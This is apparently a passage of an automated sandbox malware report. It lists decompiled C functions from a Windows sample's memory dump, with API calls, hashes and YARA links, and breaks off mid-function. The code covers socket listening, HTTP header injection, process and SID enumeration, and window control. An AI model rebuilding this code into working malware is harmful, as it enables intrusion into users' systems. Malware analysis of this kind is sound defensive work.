Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3

WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 0041D097
CloseHandle.KERNEL32(?), ref: 0041D0A7
CloseHandle.KERNEL32(?), ref: 0041D0AD
SystemParametersInfoW.USER32 ref: 0041D0BC

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWaitclosesocketconnectsetsockoptsocket
String ID:
API String ID: 1240616959-0
Opcode ID: d63e94ef398933a8099d5040c400fb7058f2e99ca655ec4dddcdaceb96e81dee
Instruction ID: 007ecb5d2ae6c26e217609dc3fab3f7ca9ff6910374346e168e623f8bc3cf19d
Opcode Fuzzy Hash: d63e94ef398933a8099d5040c400fb7058f2e99ca655ec4dddcdaceb96e81dee
Instruction Fuzzy Hash: 4261BF71408341AFDB20EF65CD44A9FBBE8AF85718F00492FF594A7291D778C889CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00411B95, Relevance: 12.2, APIs: 8, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411B95(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v104;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v125;
				char _v128;
				char _v136;
				intOrPtr _v172;
				char _v173;
				signed int _v176;
				intOrPtr _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t85;
				signed int _t88;
				void* _t92;
				void* _t96;
				void* _t100;
				signed int _t107;
				signed char* _t119;
				signed int _t120;
				struct _CRITICAL_SECTION* _t126;
				char* _t138;
				char* _t139;
				char* _t140;
				signed int _t142;
				signed int _t148;

				_v120 = _v120 | 0xffffffff;
				if(E00411A7A( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L23:
					E00410A15( &_v76);
					return _v120;
				}
				_t85 = E004100E7( &_v76);
				_v120 = _t85;
				if((1 & _t85) == 0) {
					__eflags = _t85 & 0x00000002;
					if((_t85 & 0x00000002) == 0) {
						_t126 = 0x4230dc;
						L18:
						__eflags = _v116 & 0x00000004;
						if((_v116 & 0x00000004) == 0) {
							goto L23;
						}
						 *_a8 = _v40;
						 *_a12 = _v36;
						EnterCriticalSection(_t126);
						_t146 = _a4;
						_t88 = E004110FC(_a4);
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							L21:
							_t148 = _t88 * 0x24;
							__eflags = _t148;
							E00416421( *((intOrPtr*)(_t148 +  *0x4230f4 + 8)));
							 *((intOrPtr*)(_t148 +  *0x4230f4 + 8)) = _v44;
							L22:
							LeaveCriticalSection(_t126);
							goto L23;
						}
						_t88 = E00411122(_t88, _t146);
						__eflags = _t88 - 0xffffffff;
						if(_t88 == 0xffffffff) {
							goto L22;
						}
						goto L21;
					}
					_v124 = _v124 & 0x00000000;
					_v125 = 1;
					__eflags = _v16 - 1;
					if(_v16 != 1) {
						L9:
						_t138 =  &_v104;
						_t92 = 0x21;
						E0041596E(_t92, _t138);
						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
						_t139 =  &_v128;
						_t96 = 0x22;
						E0041596E(_t96, _t139);
						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
						_t140 =  &_v136;
						_t100 = 0x23;
						E0041596E(_t100, _t140);
						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
						L10:
						_t126 = 0x4230dc;
						EnterCriticalSection(0x4230dc);
						__eflags = _v173;
						if(_v173 == 0) {
							L14:
							E00410A7F(_v64, _v68);
							__eflags = _v176;
							if(_v176 != 0) {
								E004180AE(_v172);
							}
							L16:
							LeaveCriticalSection(_t126);
							goto L18;
						}
						_t150 = _a4;
						_t107 = E004110FC(_a4);
						__eflags = _t107 - 0xffffffff;
						if(_t107 != 0xffffffff) {
							L13:
							_t142 = _t107 * 0x24;
							E00410A7F( *((intOrPtr*)( *0x4230f4 + _t142 + 0x10)),  *((intOrPtr*)( *0x4230f4 + _t142 + 0xc)));
							E00416421( *(_t142 +  *0x4230f4 + 0x14));
							 *(_t142 +  *0x4230f4 + 0x14) =  *(_t142 +  *0x4230f4 + 0x14) & 0x00000000;
							 *(_t142 +  *0x4230f4 + 0x1c) =  *(_t142 +  *0x4230f4 + 0x1c) & 0x00000000;
							 *(_t142 +  *0x4230f4 + 0x18) =  *(_t142 +  *0x4230f4 + 0x18) | 0xffffffff;
							 *((intOrPtr*)(_t142 +  *0x4230f4 + 0xc)) = _v76;
							 *((intOrPtr*)(_t142 +  *0x4230f4 + 0x10)) = _v72;
							 *((intOrPtr*)(_t142 +  *0x4230f4 + 0x20)) = _v180;
							goto L16;
						}
						_t107 = E00411122(_t107, _t150);
						__eflags = _t107 - 0xffffffff;
						if(_t107 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t119 = _v20;
					__eflags =  *_t119 & 0x00000003;
					if(( *_t119 & 0x00000003) == 0) {
						goto L9;
					}
					_t120 = E00410CB9(_t119,  &_v76);
					_v124 = _t120;
					__eflags = _t120;
					if(_t120 != 0) {
						_v120 = 1;
					} else {
						_v125 = _t120;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v120 = _v120 & 0x00000000;
					goto L23;
				}
			}

0x00411ba1
0x00411bbe
0x00411da6
0x00411daa
0x00411db9
0x00411db9
0x00411bc7
0x00411bcf
0x00411bd5
0x00411bec
0x00411bee
0x00411d41
0x00411d46
0x00411d46
0x00411d4b
0x00000000
0x00000000
0x00411d54
0x00411d5e
0x00411d60
0x00411d66
0x00411d69
0x00411d6e
0x00411d71
0x00411d7e
0x00411d85
0x00411d85
0x00411d8c
0x00411d9b
0x00411d9f
0x00411da0
0x00000000
0x00411da0
0x00411d74
0x00411d79
0x00411d7c
0x00000000
0x00000000
0x00000000
0x00411d7c
0x00411bf4
0x00411bf9
0x00411bfd
0x00411c01
0x00411c29
0x00411c2b
0x00411c2f
0x00411c30
0x00411c48
0x00411c4c
0x00411c50
0x00411c51
0x00411c64
0x00411c68
0x00411c6c
0x00411c6d
0x00411c7b
0x00411c7d
0x00411c7d
0x00411c83
0x00411c89
0x00411c8e
0x00411d18
0x00411d23
0x00411d28
0x00411d2d
0x00411d33
0x00411d33
0x00411d38
0x00411d39
0x00000000
0x00411d39
0x00411c94
0x00411c97
0x00411c9c
0x00411c9f
0x00411cac
0x00411cb3
0x00411cbe
0x00411ccc
0x00411cd6
0x00411ce0
0x00411cea
0x00411cf8
0x00411d05
0x00411d12
0x00000000
0x00411d12
0x00411ca2
0x00411ca7
0x00411caa
0x00000000
0x00000000
0x00000000
0x00411caa
0x00411c03
0x00411c07
0x00411c0a
0x00000000
0x00000000
0x00411c10
0x00411c15
0x00411c19
0x00411c1b
0x00411c23
0x00411c1d
0x00411c1d
0x00411c1d
0x00000000
0x00411bd7
0x00411bdc
0x00411be2
0x00000000
0x00411be2

APIs

Part of subcall function 004100E7: EnterCriticalSection.KERNEL32(004230BC,-00422FC8,00000000,00422FAC), ref: 00410102
Part of subcall function 004100E7: LeaveCriticalSection.KERNEL32(004230BC), ref: 00410185

SetLastError.KERNEL32(00002F78,?), ref: 00411BDC
EnterCriticalSection.KERNEL32(004230DC), ref: 00411C83
LeaveCriticalSection.KERNEL32(004230DC,?), ref: 00411D39
EnterCriticalSection.KERNEL32(004230DC,?), ref: 00411D60
LeaveCriticalSection.KERNEL32(004230DC,?), ref: 00411DA0

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID:
API String ID: 486337731-0
Opcode ID: da1402a21e1fe198c6858913a0838f65cb266c623abc251331a159136cc6fbf1
Instruction ID: 496a4979a579abad3ed6fc87abc49ad9faa2688de17775522f92fc069ce05486
Opcode Fuzzy Hash: da1402a21e1fe198c6858913a0838f65cb266c623abc251331a159136cc6fbf1
Instruction Fuzzy Hash: F351D330604301DFC720DF28D985A9ABBE5FF84364F104A1AFA50972B1D738ED81CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00410F1A, Relevance: 12.2, APIs: 8, Instructions: 151
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00410F1A(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				intOrPtr _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				void* _t49;
				void* _t55;
				void* _t56;
				void* _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				void* _t72;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E0040679A(__ecx, 0x743c152e, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					if(E004068C0() == 0) {
						L26:
						E00419BF4(_v148);
						_t49 = 0;
						L27:
						return _t49;
					}
					E0041CD26(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E00410DC5( &_v160, _v78,  &_v168) & 0x0000ffff;
					if(_t94 != 0) {
						L7:
						if(_t94 != _v74) {
							E0041CDE1( &_v124);
							_v78 = _t94;
							E0041CE39( &_v128);
						}
						_t55 =  *0x422e04; // 0x0
						_v144 = _t55;
						_t56 = _v152;
						_v172 = 1;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						if(_t57 != 0) {
							_t87 = _v172;
							_v172 = _v172 + 1;
							 *((intOrPtr*)(_t100 + 0x2c + _v172 * 4)) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						if(_t59 <= 0) {
							L25:
							E004197C4(_t59, _v156);
							E004197C4(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(_t59 < _v172) {
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								if(_t64 != _v152) {
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t65 =  *_t85(_v168, 0, 0);
											_t97 = _t65;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
											E0041981C(_t87, _t97);
											if(E00417E56(0x20000, E00410E4D, _t97) == 0) {
												E004197C4(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					}
					while(WaitForSingleObject( *0x422e04, 0x3e8) == 0x102) {
						_t87 = _v74;
						_t94 = E00410DC5( &_v156, _v74,  &_v164) & 0x0000ffff;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}

0x00410f20
0x00410f2b
0x00410f32
0x00410f39
0x00410f3f
0x00410f50
0x004110e8
0x004110ec
0x004110f1
0x004110f3
0x004110f9
0x004110f9
0x00410f5b
0x00410f60
0x00410f72
0x00410f78
0x00410fb5
0x00410fba
0x00410fc1
0x00410fcb
0x00410fd0
0x00410fd0
0x00410fd5
0x00410fda
0x00410fde
0x00410fe2
0x00410fec
0x00410fee
0x00410ff2
0x00410ff2
0x00410ff6
0x00410ffc
0x00410ffe
0x00411002
0x00411006
0x00411006
0x00411016
0x0041101e
0x004110c4
0x004110c8
0x004110dd
0x004110e6
0x00000000
0x00411024
0x00411024
0x0041102a
0x00411034
0x0041103c
0x00411048
0x0041109c
0x0041109c
0x004110a2
0x004110a4
0x004110a9
0x00000000
0x00000000
0x00411057
0x00411073
0x00411077
0x0041107e
0x00411095
0x00411097
0x00411097
0x00411095
0x004110b6
0x004110be
0x00000000
0x00000000
0x00000000
0x004110be
0x0041104a
0x0041104e
0x0041104e
0x00000000
0x0041104e
0x0041103e
0x00000000
0x0041103e
0x00000000
0x0041102a
0x0041101e
0x00410f7a
0x00410f92
0x00410fa4
0x00410faa
0x00000000
0x00000000
0x00000000
0x00410faa
0x00410faf
0x00000000
0x00000000
0x00000000
0x00410faf
0x00410f43
0x00000000

APIs

Part of subcall function 0040679A: CreateMutexW.KERNEL32(00422978,00000000,?,?,?,?,?), ref: 004067BB

WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 00410F85
WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 00411016
accept.WS2_32(?,00000000,00000000), ref: 004110A2
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 004110B6
CloseHandle.KERNEL32(?), ref: 004110D7
CloseHandle.KERNEL32(?), ref: 004110E6

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
String ID:
API String ID: 38240579-0
Opcode ID: 1565d399004beede7f2db68433f18c8e662f5a84f24f131b869312ad8ea393a1
Instruction ID: 8b40969400a0f428c40e04034a8f074897f883eddacf8aa2981f0e7da8c8b669
Opcode Fuzzy Hash: 1565d399004beede7f2db68433f18c8e662f5a84f24f131b869312ad8ea393a1
Instruction Fuzzy Hash: 87518D31508241ABC720EF65DD85CAFBBE8EB88704F10092EF694E31A0D7749DC58B1A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB9B, Relevance: 12.1, APIs: 8, Instructions: 116
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CB9B() {
				long _v564;
				char _v568;
				void* _v572;
				char _v576;
				void* _v580;
				void* _v584;
				void* _v588;
				char _v589;
				signed int _v592;
				signed int _v596;
				char _v597;
				void* __esi;
				void* _t42;
				struct tagPROCESSENTRY32W* _t45;
				signed int _t47;
				void* _t48;
				long _t56;
				intOrPtr* _t57;
				void** _t59;
				void** _t60;
				void** _t62;
				long _t67;
				int _t74;
				void** _t76;
				void* _t79;

				_t74 = 0;
				_v589 = 0;
				_v584 = 0;
				_v588 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t74);
					_v584 = _t42;
					_v580 = _t74;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_t45 =  &_v568;
						_v568 = 0x22c;
						Process32FirstW(_v584, _t45);
					}
					while(_t45 != 0) {
						_t67 = _v564;
						__eflags = _t67 - _t74;
						if(_t67 <= _t74) {
							L20:
							_t45 = Process32NextW(_v588,  &_v572);
							continue;
						}
						__eflags = _t67 -  *0x422bb0; // 0x0
						if(__eflags == 0) {
							goto L20;
						}
						_t47 = 0;
						__eflags = _v596 - _t74;
						if(_v596 <= _t74) {
							L8:
							_t48 = E004066F1(_t67, _t72, _t67);
							_v584 = _t48;
							__eflags = _t48 - _t74;
							if(_t48 == _t74) {
								goto L20;
							}
							_t79 = OpenProcess(0x400, _t74, _v564);
							__eflags = _t79 - _t74;
							if(_t79 == _t74) {
								L19:
								CloseHandle(_v580);
								goto L20;
							}
							_t76 = E00417A38(_t67, _t79,  &_v576);
							CloseHandle(_t79);
							__eflags = _t76;
							if(_t76 == 0) {
								L18:
								_t74 = 0;
								__eflags = 0;
								goto L19;
							} else {
								__eflags = _v576 -  *0x422950; // 0x0
								if(__eflags == 0) {
									_t56 = GetLengthSid( *_t76);
									__eflags = _t56 -  *0x422948;
									if(_t56 ==  *0x422948) {
										_t57 =  *0x422944; // 0x0
										_t59 = E00416492( *_t57,  *_t76, _t56);
										__eflags = _t59;
										if(_t59 == 0) {
											_t60 = E004163AC(4 + _v596 * 4,  &_v592);
											__eflags = _t60;
											if(_t60 != 0) {
												_t72 = _v596;
												_v596 = _v596 + 1;
												_v584 = _v584 + 1;
												 *((intOrPtr*)(_v592 + _v596 * 4)) = _v564;
												_t62 = E0041CB12(_v592, _v564, _v580);
												__eflags = _t62;
												if(_t62 != 0) {
													_v597 = 1;
												}
											}
										}
									}
								}
								E00416421(_t76);
								goto L18;
							}
						} else {
							goto L6;
						}
						while(1) {
							L6:
							_t72 = _v592;
							__eflags =  *((intOrPtr*)(_t72 + _t47 * 4)) - _t67;
							if( *((intOrPtr*)(_t72 + _t47 * 4)) == _t67) {
								goto L20;
							}
							_t47 = _t47 + 1;
							__eflags = _t47 - _v596;
							if(_t47 < _v596) {
								continue;
							}
							goto L8;
						}
						goto L20;
					}
					CloseHandle(_v588);
					if(_v584 != _t74) {
						continue;
					}
					break;
				}
				E00416421(_v588);
				return _v597;
			}

0x0041cbb0
0x0041cbb2
0x0041cbb7
0x0041cbbb
0x0041cbbf
0x0041cbc2
0x0041cbc8
0x0041cbcc
0x0041cbd3
0x00000000
0x0041cbd9
0x0041cbd9
0x0041cbe2
0x0041cbea
0x0041cbea
0x0041ccfa
0x0041cbf5
0x0041cbf9
0x0041cbfb
0x0041cceb
0x0041ccf4
0x00000000
0x0041ccf4
0x0041cc01
0x0041cc07
0x00000000
0x00000000
0x0041cc0d
0x0041cc0f
0x0041cc13
0x0041cc29
0x0041cc2a
0x0041cc2f
0x0041cc33
0x0041cc35
0x00000000
0x00000000
0x0041cc4b
0x0041cc4d
0x0041cc4f
0x0041cce5
0x0041cce9
0x00000000
0x0041cce9
0x0041cc61
0x0041cc63
0x0041cc65
0x0041cc67
0x0041cce3
0x0041cce3
0x0041cce3
0x00000000
0x0041cc69
0x0041cc6d
0x0041cc73
0x0041cc77
0x0041cc7d
0x0041cc83
0x0041cc88
0x0041cc8f
0x0041cc94
0x0041cc96
0x0041cca7
0x0041ccac
0x0041ccae
0x0041ccb0
0x0041ccc0
0x0041ccc4
0x0041ccc8
0x0041cccf
0x0041ccd4
0x0041ccd6
0x0041ccd8
0x0041ccd8
0x0041ccd6
0x0041ccae
0x0041cc96
0x0041cc83
0x0041ccde
0x00000000
0x0041ccde
0x00000000
0x00000000
0x00000000
0x0041cc15
0x0041cc15
0x0041cc15
0x0041cc19
0x0041cc1c
0x00000000
0x00000000
0x0041cc22
0x0041cc23
0x0041cc27
0x00000000
0x00000000
0x00000000
0x0041cc27
0x00000000
0x0041cc15
0x0041cd06
0x0041cd0c
0x00000000
0x00000000
0x00000000
0x0041cd0c
0x0041cd16
0x0041cd25

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041CBC2
Process32FirstW.KERNEL32 ref: 0041CBEA
OpenProcess.KERNEL32(00000400,00000000,0000022C,0000022C), ref: 0041CC45
CloseHandle.KERNEL32(00000000,00000000,?), ref: 0041CC63
GetLengthSid.ADVAPI32(00000000), ref: 0041CC77
CloseHandle.KERNEL32(?), ref: 0041CCE9
Process32NextW.KERNEL32(?,?), ref: 0041CCF4
CloseHandle.KERNEL32(?), ref: 0041CD06

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 1981844004-0
Opcode ID: 2e97cd70e9e722d8d097b33df0c4f51812a0ac5d08a9eb1ab3aaa51b5f920af1
Instruction ID: b0cbfc17900ba3c44c69b3fd161efd8ff52d1b3e4aca9ae37c93d05d0b6cca63
Opcode Fuzzy Hash: 2e97cd70e9e722d8d097b33df0c4f51812a0ac5d08a9eb1ab3aaa51b5f920af1
Instruction Fuzzy Hash: D4415B70148341EBC711EF25DD849ABBBE5BF89304F10092EF99992260E735DD85CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004075F4, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004075F4(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}

0x004075fd
0x00407604
0x00407606
0x00407608
0x0040760e
0x00407621
0x00407624
0x00407627
0x00407634
0x0040763c
0x00407647
0x00407666
0x0040766a
0x0040766d
0x0040768b
0x0040768b
0x0040768e
0x004076ae
0x00000000
0x00407690
0x00407690
0x00407690
0x00407691
0x004076a9
0x00407693
0x00407693
0x00407693
0x00407694
0x004076a1
0x00000000
0x00407696
0x00407696
0x00407697
0x00000000
0x00000000
0x00407697
0x00407694
0x00407691
0x0040766f
0x0040766f
0x00407686
0x00407686
0x00000000
0x00407671
0x00407672
0x00407672
0x00407673
0x00000000
0x00407675
0x00407676
0x00407676
0x00407677
0x00407699
0x00407699
0x00000000
0x00407679
0x00407679
0x00407679
0x0040767c
0x004076a4
0x004076a4
0x0040767e
0x0040767e
0x0040767e
0x0040767f
0x0040769c
0x0040769c
0x00407681
0x00407681
0x00407682
0x004076b1
0x004076b1
0x004076b1
0x00407682
0x0040767f
0x0040767c
0x00407677
0x00407673
0x0040766f
0x00407649
0x00407649
0x0040764c
0x00407652
0x00407658
0x0040765b
0x0040765e
0x00407661
0x00407661
0x004076b8
0x004076c0
0x004076d2
0x004076e6
0x004076e6
0x00000000
0x0040770a
0x004076c0
0x00407714

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407608
ReleaseMutex.KERNEL32(?), ref: 00407627
GetWindowRect.USER32 ref: 00407634
IsRectEmpty.USER32(?), ref: 004076B8
GetWindowLongW.USER32(?,000000F0), ref: 004076C7
GetParent.USER32(?), ref: 004076DD
MapWindowPoints.USER32 ref: 004076E6
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040770A

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: 5bba1a825e21bfb67c7bf15ea1a917b011608e6a097dce4e4fdde1a571f89946
Instruction ID: 2f56ed97006f8743b138d37b0a4de8c432a844e7f4ec856645651dc1a4a748d9
Opcode Fuzzy Hash: 5bba1a825e21bfb67c7bf15ea1a917b011608e6a097dce4e4fdde1a571f89946
Instruction Fuzzy Hash: 59412171D0460AAFDF109FACC9459FEBBB4FB04360F10097AE512F22A1D779A940DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00410561, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00410561(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
				char _v540;
				char _v800;
				char _v804;
				char _v860;
				struct _SYSTEMTIME _v876;
				char _v900;
				signed int _v968;
				signed int _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				char* _v992;
				char _v996;
				void* _v1008;
				struct _SYSTEMTIME _v1028;
				signed int _v1032;
				short _v1036;
				signed short* _v1040;
				signed int _v1044;
				intOrPtr* _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				char _v1068;
				intOrPtr _v1072;
				char _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t158;
				signed int _t159;
				intOrPtr _t160;
				signed int _t168;
				void* _t188;
				void* _t199;
				signed int _t211;
				signed int _t215;
				signed int _t218;
				signed char _t222;
				signed int _t224;
				void* _t227;
				void* _t228;
				signed int _t229;
				signed int _t230;
				signed int _t240;
				void* _t242;
				signed int _t250;
				intOrPtr* _t254;
				signed int _t255;
				intOrPtr _t258;
				short* _t261;
				void* _t280;
				intOrPtr* _t286;
				signed int _t291;
				long _t294;
				signed short* _t296;
				signed short* _t298;
				signed int _t301;
				intOrPtr* _t303;
				signed int _t307;
				void* _t309;

				_t309 = (_t307 & 0xfffffff8) - 0x424;
				_v1032 = _v1032 & 0x00000000;
				if(__eax == 0) {
					L52:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t286 = __ecx + 0x10;
					_v1048 = _t286;
					_v1028.wDayOfWeek = __eax;
					do {
						_t258 =  *_t286;
						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
						_v1028.wHour = _t279;
						if(_t258 == 0) {
							_t254 = _a8;
							L6:
							_t259 =  *(_t286 + 4);
							_v1052 = _v1052 & 0x00000000;
							_v1064 = _v1064 & 0x00000000;
							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
							_v1028.wSecond = _t158;
							if(_t259 >= _t158) {
								L35:
								_t159 =  *(_t286 - 0x10);
								_t294 = 0;
								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
									if((_t159 & 0x00000200) == 0) {
										_t255 = E00416661(_t159 | 0xffffffff, 0, _a4);
										__eflags = _t255;
										if(_t255 != 0) {
											_t188 = 9;
											E004159A4(_t188,  &_v996);
											_push(_v1052);
											E00405851(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
											_t309 = _t309 + 0x18;
											E00416421(_t255);
										}
									} else {
										_t280 = 0x3c;
										E004164D4( &_v996,  &_v996, 0, _t280);
										_v992 =  &_v800;
										_v1008 = _t280;
										_v988 = 0x103;
